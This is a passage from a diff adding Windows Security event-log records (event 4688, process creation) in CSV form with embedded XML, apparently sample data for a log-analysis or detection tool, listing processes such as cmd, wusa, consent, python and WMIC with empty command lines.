+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x248</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-03-19T04:02:07.445773+04:00,1552953727.445773,4688,C:\Windows\System32\wbem\WmiPrvSE.exe,WIN-77LTAPHIQ1R$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T00:02:04.398153Z"">
+    </TimeCreated>
+    <EventRecordID>566844</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""1676"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">WIN-77LTAPHIQ1R$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x3b4</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x248</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-03-19T04:02:04.367441+04:00,1552953724.367441,4688,C:\Windows\System32\tasklist.exe,WIN-77LTAPHIQ1R$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T00:02:04.335561Z"">
+    </TimeCreated>
+    <EventRecordID>566839</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""3812"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">WIN-77LTAPHIQ1R$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x970</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\tasklist.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0xbcc</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-03-19T04:02:04.351252+04:00,1552953724.351252,4688,C:\Windows\System32\conhost.exe,WIN-77LTAPHIQ1R$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T00:02:04.335561Z"">
+    </TimeCreated>
+    <EventRecordID>566838</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""3812"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">WIN-77LTAPHIQ1R$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0xebc</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\conhost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0xbcc</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-03-19T04:02:04.335561+04:00,1552953724.335561,4688,C:\Windows\System32\cmd.exe,WIN-77LTAPHIQ1R$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T00:02:04.319945Z"">
+    </TimeCreated>
+    <EventRecordID>566837</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""3812"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">WIN-77LTAPHIQ1R$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0xbcc</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x33c</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+1601-01-01T04:00:00+04:00,-11644473600.0,4688,C:\Windows\System32\conhost.exe,IEWIN7$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-11T17:10:10.904945Z"">
+    </TimeCreated>
+    <EventRecordID>18208</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""44"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">IEWIN7$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x8dc</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\conhost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x188</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-05-11T21:10:10.904945+04:00,1557594610.904945,4688,C:\Windows\System32\cmd.exe,IEWIN7$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-11T17:10:10.889320Z"">
+    </TimeCreated>
+    <EventRecordID>18207</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""52"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">IEWIN7$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0xc74</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x4f0</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-05-11T21:10:10.889320+04:00,1557594610.88932,4688,C:\Windows\System32\wusa.exe,IEWIN7$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-11T17:10:10.826820Z"">
+    </TimeCreated>
+    <EventRecordID>18205</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""52"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">IEWIN7$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x5b0</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\wusa.exe</Data>
+    <Data Name=""TokenElevationType"">%%1937</Data>
+    <Data Name=""ProcessId"">0x4f0</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-05-11T21:10:10.826820+04:00,1557594610.82682,4688,C:\Windows\System32\dllhost.exe,IEWIN7$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-11T17:10:10.795570Z"">
+    </TimeCreated>
+    <EventRecordID>18204</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""52"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">IEWIN7$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x27c</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\dllhost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x258</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-05-11T21:10:10.795570+04:00,1557594610.79557,4688,C:\Windows\System32\dllhost.exe,IEWIN7$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-11T17:10:10.748695Z"">
+    </TimeCreated>
+    <EventRecordID>18201</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""52"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">IEWIN7$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0xec8</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\dllhost.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x258</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-05-11T21:10:10.654945+04:00,1557594610.654945,4688,C:\Windows\System32\consent.exe,IEWIN7$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-11T17:10:10.623695Z"">
+    </TimeCreated>
+    <EventRecordID>18198</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""52"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">IEWIN7$</Data>
+    <Data Name=""SubjectDomainName"">WORKGROUP</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x7f0</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\consent.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x3c8</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-05-11T21:10:10.623695+04:00,1557594610.623695,4688,C:\Windows\System32\wusa.exe,IEUser,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-11T17:10:10.608070Z"">
+    </TimeCreated>
+    <EventRecordID>18197</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""52"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0x13765</Data>
+    <Data Name=""NewProcessId"">0x628</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\wusa.exe</Data>
+    <Data Name=""TokenElevationType"">%%1938</Data>
+    <Data Name=""ProcessId"">0x4f0</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-05-11T21:10:10.608070+04:00,1557594610.60807,4688,C:\Python27\python.exe,IEUser,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-11T17:10:10.342445Z"">
+    </TimeCreated>
+    <EventRecordID>18196</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""44"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-3583694148-1414552638-2922671848-1000</Data>
+    <Data Name=""SubjectUserName"">IEUser</Data>
+    <Data Name=""SubjectDomainName"">IEWIN7</Data>
+    <Data Name=""SubjectLogonId"">0x13765</Data>
+    <Data Name=""NewProcessId"">0x4f0</Data>
+    <Data Name=""NewProcessName"">C:\Python27\python.exe</Data>
+    <Data Name=""TokenElevationType"">%%1938</Data>
+    <Data Name=""ProcessId"">0x12c</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-03-18T15:27:05.455663+04:00,1552908425.455663,4688,C:\Windows\System32\wbem\WMIC.exe,user01,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-18T11:27:05.425620Z"">
+    </TimeCreated>
+    <EventRecordID>433308</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""48"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-1587066498-1489273250-1035260531-1106</Data>
+    <Data Name=""SubjectUserName"">user01</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x18a7875</Data>
+    <Data Name=""NewProcessId"">0x44c</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\wbem\WMIC.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x86c</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-02-13T22:05:06.665634+04:00,1550081106.665634,4688,C:\Windows\System32\AtBroker.exe,PC01$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T18:05:06.585519Z"">
+    </TimeCreated>
+    <EventRecordID>227784</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">PC01$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x7f0</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\AtBroker.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0xdec</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-02-13T22:05:06.585519+04:00,1550081106.585519,4688,C:\Windows\System32\rdpclip.exe,PC01$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T18:05:06.575504Z"">
+    </TimeCreated>
+    <EventRecordID>227783</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-20</Data>
+    <Data Name=""SubjectUserName"">PC01$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e4</Data>
+    <Data Name=""NewProcessId"">0xa1c</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\rdpclip.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x500</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-02-13T22:05:05.453892+04:00,1550081105.453892,4688,C:\Windows\System32\TSTheme.exe,PC01$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T18:05:05.253604Z"">
+    </TimeCreated>
+    <EventRecordID>227776</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">PC01$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x9fc</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\TSTheme.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x278</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-02-13T22:05:05.253604+04:00,1550081105.253604,4688,C:\Windows\System32\LogonUI.exe,PC01$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T18:05:05.123416Z"">
+    </TimeCreated>
+    <EventRecordID>227775</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">PC01$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0xce0</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\LogonUI.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x768</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-02-13T22:05:05.123416+04:00,1550081105.123416,4688,C:\Windows\System32\winlogon.exe,PC01$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T18:05:04.873056Z"">
+    </TimeCreated>
+    <EventRecordID>227774</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">PC01$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x768</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\winlogon.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x62c</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-02-13T22:05:04.873056+04:00,1550081104.873056,4688,C:\Windows\System32\csrss.exe,PC01$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T18:05:04.802956Z"">
+    </TimeCreated>
+    <EventRecordID>227773</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">PC01$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0xadc</Data>
+    <Data Name=""NewProcessName"">C:\Windows\System32\csrss.exe</Data>
+    <Data Name=""TokenElevationType"">%%1936</Data>
+    <Data Name=""ProcessId"">0x62c</Data>
+    <Data Name=""CommandLine""></Data>
+  </EventData>
+</Event>"
+2019-02-13T22:05:04.802956+04:00,1550081104.802956,4688,C:\Windows\System32\smss.exe,PC01$,None,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4688</EventID>
+    <Version>1</Version>
+    <Level>0</Level>
+    <Task>13312</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-02-13T18:05:04.802956Z"">
+    </TimeCreated>
+    <EventRecordID>227772</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""56"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-18</Data>
+    <Data Name=""SubjectUserName"">PC01$</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x3e7</Data>
+    <Data Name=""NewProcessId"">0x62c</Data>
